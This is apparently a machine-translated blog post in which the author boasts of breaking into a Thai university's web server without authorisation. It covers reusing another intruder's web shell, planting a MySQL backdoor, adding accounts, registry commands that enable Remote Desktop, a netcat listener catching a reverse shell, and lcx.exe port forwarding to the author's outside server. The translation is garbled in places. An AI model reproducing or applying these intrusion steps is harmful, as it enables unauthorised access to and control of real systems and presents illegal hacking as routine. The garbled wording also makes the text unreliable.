Friendship detection of a university website in Thailand and Elevation of Privilege Server

I haven't written any articles for a long time. I have never been too busy during this time, and I have nothing to write new content. I started to fight abroad for the first two days of website intrusion, and I had some gains after one or two days, I took some foreign websites and servers. In fact, some foreign websites have better intrusion than domestic websites, but it is difficult to find entry points during the Penetration Process. Yesterday, I easily won a Thai university website and server (it looks like a university, haha !).

I can't understand these birds, but it's easy to use the shell of this station. It seems that hackers have intruded into this station, I found the hacker's shell during the Penetration Process, and then stepped on his footprints.

 

This should be the shell of the predecessor. I used this to easily mount my horse. In fact, the directory permissions of some foreign servers are very large. Many of the foreign servers I have encountered can basically browse every disk, and most of them can still be written. And components like Wscript. Shell also basically exist.

It is very good to obtain the Elevation of Privilege information, but foreign servers are not so much to mention, unlike what is 360 in China, serv-u or something, neither of serv-u has seen one abroad. The only way to escalate permissions is to find the root and sa passwords. If you are lucky enough to find the two, it is basically no problem to raise the right. I have really paid a lot for this Thai server.

I checked the server information and found an intranet IP address. Then, the Registry reads the terminal port 3389, however, when I passed the cmd command, I found that 3389 was not in the listening status. Run the net start command to check that Terminal Services is enabled!

After finding the root password of the website, it is easy to escalate the permission. directly go to mysqlbackdoor, use root to install a backdoor, and then execute the command to add users.

 

Now the user adds port 3389 and forwards the port to the server. The Terminal Services Service is enabled, but port 3389 is in the listening status. Here, you can run two registry commands to enable port 3389.

Reg delete "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server"/v fDenyTSConnections/f

Reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server"/v fDenyTSConnections/t REG_DWORD/d 0

The two commands can be opened on port 3389 without restarting the server! However, it is depressing that I execute two commands on the mysql backdoor to check the port status and never see 3389 enabled. I tried it many times, but I still couldn't execute the command after I changed the MYSQL backdoor program.

I knew that he asked me to bounce a reverse shell for a try, so I sent a bounce tool to the server and found that the tool was placed in C: the execution of the mysql backdoor program fails after the statements and SettingsAll UsersDocuments directory are stored in the root directory of the d disk. The execution is successful only after the program is executed. This may be because there are spaces in the directory.

I first listened to the port on an internet server nc-v-l-p 9999, then executed the bounce tool on the server to connect to my server.

 

The reverse shell directly rebounded, because the user who executes the bounce on the server is root and has the system permission, so the reverse Shell Permission is also of the system. With these two system permissions, all the others should be easy to handle, or use the mongoshell to check whether port 3389 can be enabled. Run the reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server"/v fDenyTSConnections/t REG_DWORD/d 0 command, and the command is successful.

 

 

At the same time, when the client port is downloaded, the client port is changed to lcx.exe on the server. Then, the server executes lcx-listen 3380 on the internet server, listens to port 3381 and port 3380 on the local server, and then runs it on the server.
D: lcx.exe-slave 203.171.232.197 3380 192.168.16.4 3389 that is the IP address of my server, 203 that is the Intranet IP address of the target server, and connect the terminal to 203.171.232.197: 192.168 after execution.

 

In this way, the terminal of the target server is mounted.

 

Author: enjoyhack